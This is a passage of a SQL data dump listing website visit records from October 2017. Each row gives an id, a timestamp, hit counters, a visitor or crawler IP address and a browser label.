132.14','other'),(168572,1508507201,1,0,1,0,'66.249.64.29',''),(168573,1508507865,6,6,0,0,'46.229.168.66','other'),(168574,1508507882,5,5,0,0,'46.229.168.69','other'),(168575,1508507902,1,1,0,0,'46.229.168.65','other'),(168576,1508507919,5,5,0,0,'46.229.168.72','other'),(168577,1508507980,8,8,0,0,'46.229.168.77','other'),(168578,1508508016,4,4,0,0,'46.229.168.70','other'),(168579,1508508017,2,2,0,0,'46.229.168.78','other'),(168580,1508508053,5,5,0,0,'46.229.168.80','other'),(168581,1508508069,2,2,0,0,'46.229.168.76','other'),(168582,1508508088,9,9,0,0,'46.229.168.75','other'),(168583,1508508188,5,5,0,0,'46.229.168.79','other'),(168584,1508508206,1,1,0,0,'46.229.168.67','other'),(168585,1508508278,5,5,0,0,'46.229.168.73','other'),(168586,1508508374,1,1,0,0,'66.249.64.28','chrome'),(168587,1508508428,1,0,1,0,'66.249.70.27',''),(168588,1508508471,1,1,0,0,'46.229.168.68','other'),(168589,1508508510,3,3,0,0,'46.229.168.71','other'),(168590,1508508524,1,1,0,0,'66.249.70.27','chrome'),(168591,1508508575,1,1,0,0,'51.255.71.123','other'),(168592,1508508810,1,1,0,0,'157.55.39.243','other'),(168593,1508508841,1,1,0,0,'217.182.132.18','other'),(168594,1508508957,1,1,0,0,'46.229.168.66','other'),(168595,1508508967,2,2,0,0,'46.229.168.69','other'),(168596,1508508991,4,4,0,0,'46.229.168.75','other'),(168597,1508509066,6,6,0,0,'46.229.168.74','other'),(168598,1508509078,5,5,0,0,'46.229.168.76','other'),(168599,1508509135,5,5,0,0,'46.229.168.72','other'),(168600,1508509158,7,7,0,0,'46.229.168.70','other'),(168601,1508509172,11,11,0,0,'46.229.168.65','other'),(168602,1508509235,2,2,0,0,'46.229.168.78','other'),(168603,1508509294,7,7,0,0,'46.229.168.77','other'),(168604,1508509306,1,1,0,0,'217.182.132.170','other'),(168605,1508509416,2,2,0,0,'217.69.133.5','other'),(168606,1508509455,1,1,0,0,'46.229.168.71','other'),(168607,1508509509,4,4,0,0,'46.229.168.68','other'),(168608,1508509530,1,1,0,0,'51.255.65.9','other'),(168609,1508509618,3,3,0,0,'46.229.168.80','other'),(168610,1508509878,1,1,0,0,'46.229.168.73','other'),(168611,1508510004,2,2,0,0,'46.229.168.75','other'),(168612,1508510038,1,1,0,0,'46.229.168.79','other'),(168613,1508510075,1,1,0,0,'46.48.13.161','chrome'),(168614,1508510078,3,3,0,0,'46.229.168.74','other'),(168615,1508510093,1,1,0,0,'46.229.168.65','other'),(168616,1508510111,2,2,0,0,'46.229.168.72','other'),(168617,1508510165,1,1,0,0,'46.229.168.67','other'),(168618,1508510183,1,1,0,0,'46.229.168.70','other'),(168619,1508510317,2,2,0,0,'91.209.11.236','other'),(168620,1508511606,1,1,0,0,'51.255.65.57','other'),(168621,1508511703,1,0,1,0,'66.249.64.29',''),(168622,1508511883,1,1,0,0,'51.255.65.71','other'),(168623,1508512072,1,1,0,0,'8.29.198.25','other'),(168624,1508512130,1,1,0,0,'51.255.65.4','other'),(168625,1508512192,1,1,0,0,'51.255.71.98','other'),(168626,1508512346,1,1,0,0,'217.182.132.20','other'),(168627,1508512391,1,1,0,0,'51.255.71.115','other'),(168628,1508512414,1,1,0,0,'217.182.132.5','other'),(168629,1508512808,1,1,0,0,'51.255.65.13','other'),(168630,1508512927,1,1,0,0,'217.182.132.95','other'),(168631,1508512987,1,1,0,0,'51.255.71.123','other'),(168632,1508512992,1,1,0,0,'217.182.132.58','other'),(168633,1508513429,1,1,0,0,'51.255.65.7','other'),(168634,1508513842,1,1,0,0,'66.249.64.29','chrome'),(168635,1508513852,1,1,0,0,'66.249.70.25','chrome'),(168636,1508513865,1,1,0,0,'91.196.178.130','chrome'),(168637,1508513943,1,1,0,0,'51.255.65.3','other'),(168638,1508513992,1,1,0,0,'157.55.39.243','other'),(168639,1508514006,1,1,0,0,'217.182.132.179','other'),(168640,1508514155,1,1,0,0,'51.255.71.132','other'),(168641,1508514221,1,1,0,0,'164.132.162.188','other'),(168642,1508515000,1,1,0,0,'91.196.178.67','firefox'),(168643,1508515047,1,1,0,0,'51.255.65.31','other'),(168644,1508515220,2,2,0,0,'188.166.36.228','chrome'),(168645,1508515502,1,1,0,0,'164.132.162.159','other'),(168646,1508515979,1,1,0,0,'178.255.215.94','other'),(168647,1508516788,1,1,0,0,'217.182.132.90','other'),(168648,1508517305,1,1,0,0,'213.180.203.40','other'),(168649,1508517309,1,1,0,0,'141.8.132.22','other'),(168650,1508517488,1,1,0,0,'51.255.65.23','other'),(168651,1508517738,1,1,0,0,'217.182.132.29','other'),(168652,1508518234,1,1,0,0,'217.182.132.80','other'),(168653,1508518378,1,1,0,0,'66.249.70.29','chrome'),(168654,1508518745,1,1,0,0,'51.255.65.27','other'),(168655,1508519335,1,1,0,0,'51.255.65.81','other'),(168656,1508519484,1,1,0,0,'66.249.64.30','chrome'),(168657,1508519639,1,1,0,0,'178.154.171.88','other'),(168658,1508519799,1,1,0,0,'95.134.168.50','chrome'),(168659,1508520111,1,1,0,0,'141.8.142.74','other'),(168660,1508520332,1,1,0,0,'207.46.13.121','other'),(168661,1508520399,1,1,0,0,'77.234.45.166','other'),(168662,1508520516,1,1,0,0,'37.73.252.94','chrome'),(168663,1508520519,1,1,0,0,'217.69.133.2','other'),(168664,1508520565,1,1,0,0,'217.182.132.154','other'),(168665,1508520815,1,1,0,0,'137.74.207.159','other'),(168666,1508521142,1,0,1,0,'66.249.64.29',''),(168667,1508521259,1,0,1,0,'66.249.70.27',''),(168668,1508521822,1,1,0,0,'164.132.164.180','other'),(168669,1508521920,1,1,0,0,'217.182.132.155','other'),(168670,1508521949,1,1,0,0,'217.182.132.74','other'),(168671,1508522167,1,1,0,0,'91.196.178.130','chrome'),(168672,1508522184,1,1,0,0,'51.255.65.39','other'),(168673,1508522419,1,0,1,0,'66.249.70.25',''),(168674,1508522625,1,1,0,0,'217.182.132.95','other'),(168675,1508522672,1,1,0,0,'51.255.65.89','other'),(168676,1508522902,1,1,0,0,'8.29.198.26','other'),(168677,1508523104,1,1,0,0,'207.46.13.121','other'),(168678,1508523121,1,1,0,0,'37.73.252.94','chrome'),(168679,1508523232,1,1,0,0,'217.182.132.4','other'),(168680,1508523457,1,1,0,0,'66.249.70.27','chrome'),(168681,1508523514,1,1,0,0,'217.182.132.25','other'),(168682,1508523647,1,1,0,0,'51.255.65.58','other'),(168683,1508523865,1,1,0,0,'66.249.64.30','chrome'),(168684,1508523962,1,1,0,0,'51.255.65.20','other'),(168685,1508524010,1,1,0,0,'51.255.65.25','other'),(168686,1508524085,1,1,0,0,'141.8.142.74','other'),(168687,1508524129,1,1,0,0,'51.255.65.59','other'),(168688,1508524236,1,1,0,0,'217.182.132.177','other'),(168689,1508524310,1,1,0,0,'37.73.249.241','chrome'),(168690,1508524443,1,1,0,0,'217.69.133.6','other'),(168691,1508524449,1,1,0,0,'217.69.133.9','other'),(168692,1508524815,1,1,0,0,'217.69.133.2','other'),(168693,1508525184,1,1,0,0,'217.182.132.92','other'),(168694,1508525204,1,1,0,0,'66.249.64.29','chrome'),(168695,1508526151,1,1,0,0,'217.182.132.19','other'),(168696,1508526670,1,1,0,0,'91.196.178.163','chrome'),(168697,1508526838,1,1,0,0,'217.182.132.58','other'),(168698,1508527298,1,1,0,0,'51.255.71.98','other'),(168699,1508527526,1,1,0,0,'217.182.132.151','other'),(168700,1508527956,1,1,0,0,'95.135.172.166','other'),(168701,1508528196,1,1,0,0,'82.145.220.234','chrome'),(168702,1508528527,1,1,0,0,'137.74.207.119','other'),(168703,1508528596,1,1,0,0,'217.182.132.90','other'),(168704,1508528733,1,1,0,0,'217.182.132.179','other'),(168705,1508528796,1,1,0,0,'66.249.70.25','chrome'),(168706,1508528843,1,1,0,0,'51.255.65.86','other'),(168707,1508529301,1,1,0,0,'51.255.65.31','other'),(168708,1508529413,1,1,0,0,'178.154.171.81','other'),(168709,1508529543,1,1,0,0,'207.46.13.121','other'),(168710,1508529847,1,1,0,0,'217.182.132.6','other'),(168711,1508529979,1,1,0,0,'217.69.133.3','other'),(168712,1508530280,1,1,0,0,'217.182.132.157','other'),(168713,1508530378,1,0,1,0,'66.249.64.28',''),(168714,1508530511,1,0,1,0,'66.249.64.29',''),(168715,1508530972,1,1,0,0,'217.182.132.33','other'),(168716,1508531245,1,0,1,0,'66.249.64.30',''),(168717,1508531254,1,1,0,0,'91.196.178.70','chrome'),(168718,1508531483,1,1,0,0,'66.249.64.30','chrome'),(168719,1508532244,1,1,0,0,'217.182.132.179','other'),(168720,1508532477,1,1,0,0,'207.46.13.125','other'),(168721,1508532594,1,1,0,0,'141.8.132.22','other'),(168722,1508532681,1,1,0,0,'217.182.132.53','other'),(168723,1508533312,1,1,0,0,'178.154.171.88','other'),(168724,1508533659,1,1,0,0,'5.35.58.219','msie'),(168725,1508533719,1,1,0,0,'217.182.132.16','other'),(168726,1508533735,1,1,0,0,'8.29.198.26','other'),(168727,1508533860,1,1,0,0,'95.10.28.122','other'),(168728,1508534397,1,1,0,0,'217.182.132.192','other'),(168729,1508534494,1,1,0,0,'51.255.71.123','other'),(168730,1508534500,1,1,0,0,'217.182.132.151','other'),(168731,1508534522,1,1,0,0,'217.182.132.28','other'),(168732,1508534819,2,2,0,0,'137.74.207.159','other'),(168733,1508534978,1,1,0,0,'217.182.132.50','other'),(168734,1508534993,1,1,0,0,'51.255.65.71','other'),(168735,1508535051,1,1,0,0,'178.154.171.88','other'),(168736,1508535101,1,1,0,0,'217.182.132.23','other'),(168737,1508535386,4,4,0,0,'141.8.142.74','other'),(168738,1508535665,1,1,0,0,'54.165.59.7','other'),(168739,1508535788,1,1,0,0,'51.255.71.98','other'),(168740,1508536241,1,1,0,0,'217.182.132.93','other'),(168741,1508536352,1,1,0,0,'141.8.142.74','other'),(168742,1508536569,1,1,0,0,'51.255.71.119','other'),(168743,1508537618,1,1,0,0,'87.250.224.46','other'),(168744,1508537720,1,1,0,0,'217.182.132.76','other'),(168745,1508538184,1,0,1,0,'66.249.64.30',''),(168746,1508538492,1,1,0,0,'51.255.65.50','other'),(168747,1508538568,1,1,0,0,'213.180.203.8','other'),(168748,1508538592,2,2,0,0,'87.250.224.46','other'),(168749,1508538685,1,1,0,0,'178.154.171.88','other'),(168750,1508538854,1,1,0,0,'51.255.65.97','other'),(168751,1508538895,2,2,0,0,'141.8.142.74','other'),(168752,1508539053,1,1,0,0,'217.182.132.23','other'),(168753,1508539462,8,8,0,0,'167.114.219.41','other'),(168754,1508539557,1,1,0,0,'217.182.132.25','other'),(168755,1508539563,1,1,0,0,'37.9.113.182','other'),(168756,1508539588,1,1,0,0,'217.182.132.62','other'),(168757,1508539613,1,1,0,0,'217.182.132.66','other'),(168758,1508539855,1,1,0,0,'217.182.132.37','other'),(168759,1508540085,1,1,0,0,'217.182.132.187','other'),(168760,1508540180,1,0,1,0,'66.249.70.27',''),(168761,1508540216,2,2,0,0,'87.250.224.46','other'),(168762,1508540236,1,1,0,0,'137.74.207.159','other'),(168763,1508540296,1,1,0,0,'141.8.142.74','other'),(168764,1508540734,1,1,0,0,'217.182.132.54','other'),(168765,1508540784,1,1,0,0,'137.74.207.109','other'),(168766,1508541613,1,1,0,0,'213.180.203.8','other'),(168767,1508541751,1,1,0,0,'178.154.171.88','other'),(168768,1508541850,1,1,0,0,'217.182.132.96','other'),(168769,1508542132,1,1,0,0,'217.182.132.85','other'),(168770,1508542202,1,1,0,0,'51.255.71.111','other'),(168771,1508542787,1,1,0,0,'217.182.132.69','other'),(168772,1508543124,1,1,0,0,'217.182.132.27','other'),(168773,1508543148,1,1,0,0,'164.132.162.153','other'),(168774,1508543314,1,1,0,0,'51.255.65.87','other'),(168775,1508543407,1,1,0,0,'157.55.39.253','other'),(168776,1508543536,1,1,0,0,'141.8.142.74','other'),(168777,1508544561,1,1,0,0,'8.29.198.27','other'),(168778,1508545048,1,1,0,0,'87.250.224.46','other'),(168779,1508545284,1,1,0,0,'164.132.162.155','other'),(168780,1508545294,1,1,0,0,'217.182.132.153','other'),(168781,1508546707,1,1,0,0,'51.255.71.113','other'),(168782,1508546724,1,1,0,0,'217.69.133.9','other'),(168783,1508547211,1,1,0,0,'176.77.7.151','msie'),(168784,1508547467,1,1,0,0,'217.182.132.181','other'),(168785,1508547681,1,1,0,0,'178.154.171.88','other'),(168786,1508548752,1,1,0,0,'51.255.65.27','other'),(168787,1508548767,1,1,0,0,'51.255.71.114','other'),(168788,1508548860,1,1,0,0,'217.182.132.21','other'),(168789,1508549071,1,1,0,0,'51.255.65.36','other'),(168790,1508550366,11,11,0,0,'192.99.203.35','other'),(168791,1508550377,1,1,0,0,'51.255.65.55','other'),(168792,1508550851,1,1,0,0,'217.182.132.59','other'),(168793,1508551856,1,1,0,0,'217.182.132.81','other'),(168794,1508552594,1,1,0,0,'51.255.65.40','other'),(168795,1508552687,1,1,0,0,'51.255.71.126','other'),(168796,1508553166,1,1,0,0,'54.203.191.71','chrome'),(168797,1508553179,1,1,0,0,'217.182.132.7','other'),(168798,1508553321,1,1,0,0,'141.8.142.74','other'),(168799,1508553521,1,1,0,0,'137.74.207.120','other'),(168800,1508555035,1,1,0,0,'51.255.65.91','other'),(168801,1508555212,1,1,0,0,'217.182.132.177','other'),(168802,1508555258,1,1,0,0,'217.182.132.69','other'),(168803,1508555382,1,1,0,0,'8.29.198.25','other'),(168804,1508555388,1,1,0,0,'178.154.171.88','other'),(168805,1508555964,1,1,0,0,'207.46.13.125','other'),(168806,1508556152,1,1,0,0,'37.9.113.101','other'),(168807,1508556811,1,1,0,0,'217.182.132.186','other'),(168808,1508556925,1,1,0,0,'217.182.132.68','other'),(168809,1508557074,1,1,0,0,'217.182.132.22','other'),(168810,1508557607,1,1,0,0,'217.182.132.151','other'),(168811,1508557677,1,1,0,0,'217.69.133.3','other'),(168812,1508557712,1,1,0,0,'217.182.132.174','other'),(168813,1508557963,1,0,1,0,'66.249.70.29',''),(168814,1508558026,1,1,0,0,'178.159.37.105','chrome'),(168815,1508558469,1,1,0,0,'137.74.207.188','other'),(168816,1508558561,1,1,0,0,'217.182.132.53','other'),(168817,1508558930,1,1,0,0,'217.69.133.9','other'),(168818,1508559080,1,0,1,0,'66.249.64.30',''),(168819,1508559525,1,1,0,0,'87.250.224.46','other'),(168820,1508560158,1,1,0,0,'217.182.132.19','other'),(168821,1508561042,1,1,0,0,'164.132.162.155','other'),(168822,1508561306,1,1,0,0,'51.255.71.130','other'),(168823,1508561736,1,1,0,0,'51.255.65.67','other'),(168824,1508561990,1,1,0,0,'51.255.65.33','other'),(168825,1508562192,1,1,0,0,'173.234.234.210','other'),(168826,1508562279,1,1,0,0,'91.196.178.35','chrome'),(168827,1508562649,1,1,0,0,'51.255.65.13','other'),(168828,1508562956,1,1,0,0,'51.255.65.39','other'),(168829,1508563428,1,1,0,0,'217.182.132.77','other'),(168830,1508563464,1,1,0,0,'51.255.65.3','other'),(168831,1508563960,1,1,0,0,'51.255.71.111','other'),(168832,1508564036,1,1,0,0,'137.74.207.101','other'),(168833,1508564132,1,1,0,0,'51.255.65.67','other'),(168834,1508564600,1,1,0,0,'51.255.65.224','other'),(168835,1508564987,1,1,0,0,'51.255.65.83','other'),(168836,1508565273,1,1,0,0,'157.55.39.253','other'),(168837,1508565294,1,1,0,0,'46.48.13.161','chrome'),(168838,1508565450,1,1,0,0,'217.182.132.76','other'),(168839,1508565481,1,1,0,0,'66.249.70.29','chrome'),(168840,1508566079,1,1,0,0,'217.182.132.23','other'),(168841,1508566209,1,1,0,0,'8.29.198.25','other'),(168842,1508566339,1,1,0,0,'217.182.132.156','other'),(168843,1508566628,1,1,0,0,'51.255.71.129','other'),(168844,1508566847,1,1,0,0,'217.182.132.67','other'),(168845,1508566950,1,1,0,0,'217.182.132.20','other'),(168846,1508567490,1,1,0,0,'217.182.132.33','other'),(168847,1508567561,1,1,0,0,'82.145.221.128','chrome'),(168848,1508567782,1,1,0,0,'217.182.132.84','other'),(168849,1508567828,1,1,0,0,'51.255.65.69','other'),(168850,1508568280,1,1,0,0,'217.182.132.94','other'),(168851,1508568401,1,1,0,0,'164.132.162.154','other'),(168852,1508568634,1,1,0,0,'217.69.133.5','other'),(168853,1508568694,1,1,0,0,'217.182.132.175','other'),(168854,1508569160,1,1,0,0,'51.255.65.41','other'),(168855,1508569177,1,1,0,0,'178.154.200.7','other'),(168856,1508569522,1,1,0,0,'51.255.71.112','other'),(168857,1508569678,1,1,0,0,'217.182.132.171','other'),(168858,1508569757,1,1,0,0,'217.182.132.149','other'),(168859,1508569960,1,1,0,0,'217.69.133.6','other'),(168860,1508570119,1,1,0,0,'217.182.132.87','other'),(168861,1508570218,1,1,0,0,'217.182.132.63','other'),(168862,1508571027,1,1,0,0,'92.113.188.48','chrome'),(168863,1508571529,1,1,0,0,'217.182.132.149','other'),(168864,1508571699,1,1,0,0,'82.145.222.135','chrome'),(168865,1508571984,1,1,0,0,'91.196.178.40','chrome'),(168866,1508572200,1,1,0,0,'141.8.142.74','other'),(168867,1508572327,1,1,0,0,'217.182.132.82','other'),(168868,1508572737,1,1,0,0,'51.255.71.117','other'),(168869,1508572746,1,1,0,0,'137.74.207.164','other'),(168870,1508573141,1,1,0,0,'51.255.71.114','other'),(168871,1508573335,1,1,0,0,'217.182.132.56','other'),(168872,1508573773,1,1,0,0,'217.69.133.2','other'),(168873,1508573802,1,1,0,0,'51.255.65.55','other'),(168874,1508573873,1,1,0,0,'51.255.71.131','other'),(168875,1508574661,1,1,0,0,'217.182.132.186','other'),(168876,1508574992,1,1,0,0,'51.255.65.47','other'),(168877,1508575045,1,1,0,0,'164.132.162.164','other'),(168878,1508575069,1,1,0,0,'217.182.132.155','other'),(168879,1508575358,1,1,0,0,'207.46.13.121','other'),(168880,1508575889,1,1,0,0,'178.154.171.88','other'),(168881,1508576068,1,1,0,0,'51.255.71.113','other'),(168882,1508576308,1,1,0,0,'51.255.71.121','other'),(168883,1508576575,1,1,0,0,'137.74.201.108','other'),(168884,1508576619,1,1,0,0,'51.255.65.86','other'),(168885,1508577036,1,1,0,0,'8.29.198.25','other'),(168886,1508577118,1,1,0,0,'217.182.132.91','other'),(168887,1508577143,1,1,0,0,'217.182.132.60','other'),(168888,1508577563,1,1,0,0,'37.9.113.110','other'),(168889,1508577595,1,1,0,0,'217.182.132.17','other'),(168890,1508578399,1,1,0,0,'51.255.65.31','other'),(168891,1508578808,1,1,0,0,'164.132.162.164','other'),(168892,1508578863,1,1,0,0,'217.182.132.154','other'),(168893,1508579267,1,1,0,0,'137.74.207.188','other'),(168894,1508579338,1,1,0,0,'217.182.132.63','other'),(168895,1508579482,1,1,0,0,'51.255.65.11','other'),(168896,1508579600,1,1,0,0,'91.209.11.236','other'),(168897,1508579743,1,1,0,0,'51.255.65.88','other'),(168898,1508580014,1,1,0,0,'51.255.71.113','other'),(168899,1508580159,1,1,0,0,'157.55.39.243','other'),(168900,1508580254,1,1,0,0,'217.182.132.73','other'),(168901,1508580477,1,1,0,0,'91.201.55.91','chrome'),(168902,1508580733,1,1,0,0,'51.255.65.4','other'),(168903,1508580901,1,1,0,0,'178.154.171.88','other'),(168904,1508581251,1,1,0,0,'217.182.132.7','other'),(168905,1508581485,1,1,0,0,'51.255.71.112','other'),(168906,1508581486,1,1,0,0,'108.59.8.80','other'),(168907,1508581671,1,1,0,0,'82.145.221.242','chrome'),(168908,1508581752,1,1,0,0,'51.255.65.5','other'),(168909,1508581874,1,1,0,0,'164.132.162.158','other'),(168910,1508582203,1,1,0,0,'207.46.13.121','other'),(168911,1508582288,1,1,0,0,'217.182.132.79','other'),(168912,1508582587,1,0,1,0,'66.249.64.30',''),(168913,1508583354,1,1,0,0,'217.182.132.192','other'),(168914,1508583481,1,1,0,0,'51.255.65.24','other'),(168915,1508583840,1,1,0,0,'51.255.65.66','other'),(168916,1508583962,1,1,0,0,'51.255.65.85','other'),(168917,1508584172,1,1,0,0,'217.182.132.30','other'),(168918,1508584413,1,1,0,0,'51.255.65.14','other'),(168919,1508584743,1,1,0,0,'217.69.133.3','other'),(168920,1508584802,1,1,0,0,'176.31.231.10','other'),(168921,1508585071,1,1,0,0,'217.69.133.2','other'),(168922,1508585094,1,1,0,0,'217.182.132.23','other'),(168923,1508585726,1,1,0,0,'51.255.65.43','other'),(168924,1508585892,28,28,0,0,'5.9.63.162','other'),(168925,1508586332,1,1,0,0,'164.132.162.156','other'),(168926,1508586762,1,1,0,0,'137.74.207.102','other'),(168927,1508587264,1,1,0,0,'51.255.65.47','other'),(168928,1508587699,1,1,0,0,'217.182.132.21','other'),(168929,1508587709,1,1,0,0,'74.115.214.151','other'),(168930,1508587828,1,1,0,0,'217.182.132.17','other'),(168931,1508587863,1,1,0,0,'8.29.198.27','other'),(168932,1508588073,1,1,0,0,'217.182.132.25','other'),(168933,1508588180,1,1,0,0,'51.255.65.14','other'),(168934,1508588227,1,1,0,0,'217.182.132.181','other'),(168935,1508588298,1,1,0,0,'217.182.132.5','other'),(168936,1508589055,1,1,0,0,'51.255.65.20','other'),(168937,1508589096,1,1,0,0,'220.181.132.180','chrome'),(168938,1508589336,1,1,0,0,'207.46.13.121','other'),(168939,1508589667,1,1,0,0,'91.209.11.236','other'),(168940,1508589998,1,1,0,0,'137.74.207.109','other'),(168941,1508590989,1,1,0,0,'217.182.132.76','other'),(168942,1508591691,1,1,0,0,'37.9.113.157','other'),(168943,1508591720,1,1,0,0,'217.182.132.94','other'),(168944,1508591875,1,1,0,0,'91.209.11.236','other'),(168945,1508592008,1,1,0,0,'91.196.178.99','chrome'),(168946,1508592012,1,1,0,0,'164.132.162.157','other'),(168947,1508592121,1,1,0,0,'93.74.212.147','firefox'),(168948,1508592363,1,1,0,0,'217.182.132.150','other'),(168949,1508592866,1,1,0,0,'213.180.203.8','other'),(168950,1508592873,1,1,0,0,'51.255.65.47','other'),(168951,1508592894,1,1,0,0,'217.182.132.68','other'),(168952,1508592933,1,1,0,0,'142.4.200.37','other'),(168953,1508593018,1,1,0,0,'217.182.132.180','other'),(168954,1508593051,1,1,0,0,'164.132.162.187','other'),(168955,1508593635,1,1,0,0,'217.182.132.17','other'),(168956,1508593886,1,1,0,0,'37.9.113.63','other'),(168957,1508593890,1,1,0,0,'178.154.171.56','other'),(168958,1508594001,1,1,0,0,'217.182.132.65','other'),(168959,1508594282,1,1,0,0,'217.69.133.223','other'),(168960,1508594390,1,1,0,0,'91.196.178.161','chrome'),(168961,1508594486,1,1,0,0,'51.255.65.9','other'),(168962,1508594497,1,1,0,0,'217.69.133.220','other'),(168963,1508594876,1,1,0,0,'91.209.11.236','other'),(168964,1508595218,1,1,0,0,'91.196.178.135','chrome'),(168965,1508595496,1,1,0,0,'51.255.65.80','other'),(168966,1508595790,1,1,0,0,'51.255.65.21','other'),(168967,1508596260,1,1,0,0,'217.182.132.84','other'),(168968,1508596336,1,1,0,0,'217.182.132.32','other'),(168969,1508596888,1,1,0,0,'157.55.39.253','other'),(168970,1508596897,1,1,0,0,'137.74.207.108','other'),(168971,1508597816,1,1,0,0,'51.255.65.5','other'),(168972,1508598205,1,1,0,0,'37.9.113.134','other'),(168973,1508598422,1,1,0,0,'137.74.207.110','other'),(168974,1508598486,1,1,0,0,'51.255.65.94','other'),(168975,1508598525,1,1,0,0,'217.182.132.19','other'),(168976,1508598684,1,1,0,0,'8.29.198.25','other'),(168977,1508600146,1,1,0,0,'51.255.65.27','other'),(168978,1508600362,1,1,0,0,'51.255.71.101','other'),(168979,1508600457,1,1,0,0,'51.255.65.13','other'),(168980,1508600641,1,1,0,0,'91.209.11.236','other'),(168981,1508600790,1,1,0,0,'217.182.132.181','other'),(168982,1508600833,1,1,0,0,'46.119.115.23','chrome'),(168983,1508601071,1,1,0,0,'51.255.65.69','other'),(168984,1508601526,1,1,0,0,'51.255.65.97','other'),(168985,1508601790,1,1,0,0,'217.182.132.149','other'),(168986,1508603582,1,1,0,0,'87.250.224.77','other'),(168987,1508604085,1,1,0,0,'80.252.154.233','firefox'),(168988,1508604120,1,1,0,0,'51.255.65.47','other'),(168989,1508604294,1,1,0,0,'217.182.132.74','other'),(168990,1508604318,1,1,0,0,'51.255.65.79','other'),(168991,1508604442,1,1,0,0,'217.182.132.69','other'),(168992,1508604444,1,1,0,0,'217.182.132.81','other'),(168993,1508605553,1,1,0,0,'217.182.132.182','other'),(168994,1508606044,1,1,0,0,'217.182.132.175','other'),(168995,1508606944,1,1,0,0,'217.182.132.82','other'),(168996,1508606959,1,1,0,0,'37.9.113.56','other'),(168997,1508607511,1,1,0,0,'141.8.142.126','other'),(168998,1508607709,1,1,0,0,'217.182.132.240','other'),(168999,1508608156,1,1,0,0,'51.255.65.7','other'),(169000,1508608404,1,1,0,0,'167.114.209.38','other'),(169001,1508608427,1,1,0,0,'167.114.209.38','chrome'),(169002,1508608640,1,1,0,0,'217.182.132.30','other'),(169003,1508608994,1,1,0,0,'5.255.253.35','other'),(169004,1508609203,1,1,0,0,'51.255.65.46','other'),(169005,1508609234,1,1,0,0,'87.250.224.96','other'),(169006,1508609505,1,1,0,0,'8.29.198.27','other'),(169007,1508610301,1,1,0,0,'37.9.113.132','other'),(169008,1508610372,2,2,0,0,'95.10.22.63','other'),(169009,1508610581,1,1,0,0,'178.154.171.10','other'),(169010,1508610680,1,1,0,0,'51.255.65.28','other'),(169011,1508610853,1,1,0,0,'180.76.15.15','other'),(169012,1508611117,1,1,0,0,'213.180.203.7','other'),(169013,1508611248,1,1,0,0,'95.132.59.144','firefox'),(169014,1508611476,1,1,0,0,'141.8.142.123','other'),(169015,1508611480,1,1,0,0,'37.9.113.60','other'),(169016,1508611683,1,0,1,0,'66.249.64.29',''),(169017,1508611699,1,1,0,0,'92.112.124.41','chrome'),(169018,1508612348,1,1,0,0,'217.182.132.150','other'),(169019,1508612379,1,1,0,0,'51.255.65.68','other'),(169020,1508612430,1,1,0,0,'217.182.132.65','other'),(169021,1508612899,1,1,0,0,'217.182.132.54','other'),(169022,1508613188,2,2,0,0,'37.9.113.132','other'),(169023,1508614383,1,1,0,0,'51.255.65.4','other'),(169024,1508614440,1,1,0,0,'51.255.65.30','other'),(169025,1508614534,1,1,0,0,'51.255.71.131','other'),(169026,1508614798,1,1,0,0,'141.8.142.29','other'),(169027,1508615468,1,1,0,0,'164.132.162.164','other'),(169028,1508615490,1,1,0,0,'51.255.65.63','other'),(169029,1508615821,1,1,0,0,'51.255.65.25','other'),(169030,1508615902,1,1,0,0,'51.255.65.77','other'),(169031,1508616201,1,1,0,0,'141.8.142.50','other'),(169032,1508616226,1,1,0,0,'51.255.65.88','other'),(169033,1508616833,1,1,0,0,'217.182.132.83','other'),(169034,1508617410,1,1,0,0,'217.182.132.50','other'),(169035,1508617542,1,1,0,0,'141.8.142.123','other'),(169036,1508617558,1,1,0,0,'74.115.214.132','other'),(169037,1508617622,1,1,0,0,'217.182.132.95','other'),(169038,1508617637,1,1,0,0,'217.69.133.3','other'),(169039,1508617949,1,1,0,0,'51.255.65.58','other'),(169040,1508618056,1,1,0,0,'180.76.15.142','other'),(169041,1508618297,1,1,0,0,'164.132.162.153','other'),(169042,1508618399,1,1,0,0,'198.37.118.38','firefox'),(169043,1508618620,1,1,0,0,'217.182.132.151','other'),(169044,1508618785,1,1,0,0,'51.255.65.83','other'),(169045,1508618983,1,1,0,0,'37.9.113.138','other'),(169046,1508619132,1,1,0,0,'217.182.132.172','other'),(169047,1508619388,1,1,0,0,'87.250.224.77','other'),(169048,1508619401,1,1,0,0,'95.108.181.111','other'),(169049,1508619743,1,1,0,0,'37.9.113.114','other'),(169050,1508620229,1,1,0,0,'164.132.162.157','other'),(169051,1508620331,1,1,0,0,'8.29.198.26','other'),(169052,1508620452,1,1,0,0,'51.255.65.74','other'),(169053,1508620619,1,1,0,0,'51.255.65.27','other'),(169054,1508620855,1,1,0,0,'217.182.132.79','other'),(169055,1508621527,1,1,0,0,'217.182.132.34','other'),(169056,1508621592,1,1,0,0,'51.255.65.27','other'),(169057,1508621917,1,1,0,0,'217.182.132.183','other'),(169058,1508622072,1,1,0,0,'217.182.132.94','other'),(169059,1508622397,1,1,0,0,'51.255.65.68','other'),(169060,1508622699,1,1,0,0,'66.249.70.29','chrome'),(169061,1508623602,1,1,0,0,'51.255.65.60','other'),(169062,1508623757,1,1,0,0,'67.215.230.83','other'),(169063,1508623953,1,1,0,0,'204.79.180.7','msie'),(169064,1508623983,1,1,0,0,'51.255.71.116','other'),(169065,1508624202,1,1,0,0,'217.182.132.25','other'),(169066,1508624986,1,1,0,0,'217.69.133.5','other'),(169067,1508625457,1,1,0,0,'213.180.203.40','other'),(169068,1508625606,1,1,0,0,'217.182.132.77','other'),(169069,1508625681,1,1,0,0,'217.182.132.146','other'),(169070,1508625745,1,0,1,0,'66.249.70.29',''),(169071,1508625762,1,1,0,0,'217.182.132.28','other'),(169072,1508625784,1,1,0,0,'217.182.132.32','other'),(169073,1508626108,1,1,0,0,'37.9.113.134','other'),(169074,1508626378,1,1,0,0,'95.108.213.24','other'),(169075,1508626383,1,1,0,0,'164.132.162.188','other'),(169076,1508627261,1,1,0,0,'51.255.65.81','other'),(169077,1508627549,1,1,0,0,'164.132.162.187','other'),(169078,1508628738,1,1,0,0,'217.182.132.6','other'),(169079,1508628875,1,1,0,0,'51.255.71.111','other'),(169080,1508629084,1,1,0,0,'178.154.171.88','other'),(169081,1508629089,1,1,0,0,'37.9.113.100','other'),(169082,1508629957,1,1,0,0,'178.154.171.56','other'),(169083,1508630558,1,1,0,0,'37.9.113.132','other'),(169084,1508630919,1,1,0,0,'141.8.142.50','other'),(169085,1508631020,1,1,0,0,'141.8.142.126','other'),(169086,1508631168